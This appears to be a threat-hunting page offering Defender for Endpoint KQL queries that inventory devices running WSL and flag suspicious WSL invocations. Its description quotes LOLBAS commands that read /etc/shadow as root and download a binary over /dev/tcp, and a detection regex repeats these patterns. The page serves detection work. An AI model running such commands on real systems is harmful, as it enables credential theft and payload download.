WSL Installations

# List devices that have WSL installed

## Query Information

#### Description
Windows Subsystem for Linux may be used by adversaries to perform actions as root or to download files. This query lists all devices that have WSL installed and on which it was active in the last 30 days, which gives an indication of WSL usage in your environment. Microsoft recommends block-listing WSL (see the recommended block rules below) if there is no scenario that explicitly requires it. The WSL executable is located at C:\Windows\System32\wsl.exe. From the LOLBAS project, some suspicious commands that can be executed through WSL are:

```
wsl.exe -u root -e cat /etc/shadow

wsl.exe --system calc.exe

wsl.exe --exec bash -c 'cat < /dev/tcp/192.168.1.10/54 > binary'
```


#### References
- https://learn.microsoft.com/en-us/windows/wsl/
- https://lolbas-project.github.io/lolbas/OtherMSBinaries/Wsl/
- https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules

## Defender For Endpoint
```
let WSLDevices = DeviceProcessEvents
| where Timestamp > ago(30d)
| where FileName == "wsl.exe"
| distinct DeviceId;
DeviceInfo
| where DeviceId in (WSLDevices)
| summarize arg_max(Timestamp, *) by DeviceId
```

Explanation

This query lists all devices that have Windows Subsystem for Linux (WSL) installed and were active in the last 30 days. WSL is a feature that allows running Linux command-line tools on Windows. The query selects process events from the last 30 days whose FileName is "wsl.exe", the WSL executable, and collects the distinct device IDs. It then looks up device information for those IDs and, with arg_max, keeps only the most recent DeviceInfo record per device. The purpose of this query is to identify devices with WSL installed, which could potentially be used by adversaries for malicious activities.
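The query above only inventories devices. As an added example, not part of the original query, the following KQL builds on it to surface WSL invocations in the same 30-day window whose command line matches the LOLBAS patterns quoted in the description (running as root, the --system distro, reading /etc/shadow, or a /dev/tcp download), and enriches each hit with the latest DeviceInfo record for the device. Column names are taken from the standard Defender for Endpoint schema; the regular expression is an assumption about what is worth triaging and should be tuned to your environment.

```kusto
// Added example: WSL invocations matching LOLBAS-style patterns, with device context.
let lookback = 30d;
// Patterns taken from the LOLBAS commands quoted in the description (assumed triage list).
let suspiciousPattern = @"(?i)(-u\s+root|--system|/etc/shadow|/dev/tcp)";
let SuspiciousWsl = DeviceProcessEvents
| where Timestamp > ago(lookback)
| where FileName =~ "wsl.exe"
| where ProcessCommandLine matches regex suspiciousPattern
| project Timestamp, DeviceId, DeviceName, AccountName,
          InitiatingProcessFileName, ProcessCommandLine;
// Latest DeviceInfo record per device, same arg_max idea as the original query.
let LatestDeviceInfo = DeviceInfo
| where Timestamp > ago(lookback)
| summarize arg_max(Timestamp, OSPlatform, OSVersion, PublicIP) by DeviceId
| project-away Timestamp;
SuspiciousWsl
| join kind=leftouter LatestDeviceInfo on DeviceId
| project-away DeviceId1
| sort by Timestamp desc
```

Run it in Advanced Hunting alongside the inventory query: devices that appear in the inventory but never in this result set are candidates for WSL usage review, while any row here warrants looking at the initiating process and account before deciding whether it is legitimate administration.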

Details

Bert-Jan Pals

Released: February 14, 2023

Tables

DeviceProcessEvents, DeviceInfo

Keywords

Devices,DeviceProcessEvents,Timestamp,ago,FileName,wsl.exe,distinct,DeviceId,DeviceInfo,summarize,arg_max

Operators

where, distinct, summarize, arg_max